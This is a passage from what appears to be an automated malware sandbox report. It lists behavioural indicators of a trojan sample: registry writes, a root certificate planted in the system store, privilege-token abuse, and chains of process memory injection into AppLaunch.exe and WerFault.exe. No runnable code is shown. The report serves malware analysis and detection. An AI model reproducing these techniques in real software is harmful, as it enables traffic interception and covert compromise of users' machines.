Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1CAE.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2440 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe
PID 2440 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe
PID 2440 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe
PID 2440 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe
PID 2440 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe
PID 2440 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe
PID 2440 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe
PID 2044 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe
PID 2044 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe
PID 2044 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe
PID 2044 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe
PID 2044 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe
PID 2044 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe
PID 2044 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe
PID 2652 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2652 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2652 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2652 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2652 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2652 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2652 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2652 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2652 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2652 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2652 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\SysWOW64\WerFault.exe
PID 2652 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\SysWOW64\WerFault.exe
PID 2652 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\SysWOW64\WerFault.exe
PID 2652 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\SysWOW64\WerFault.exe
PID 2652 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\SysWOW64\WerFault.exe
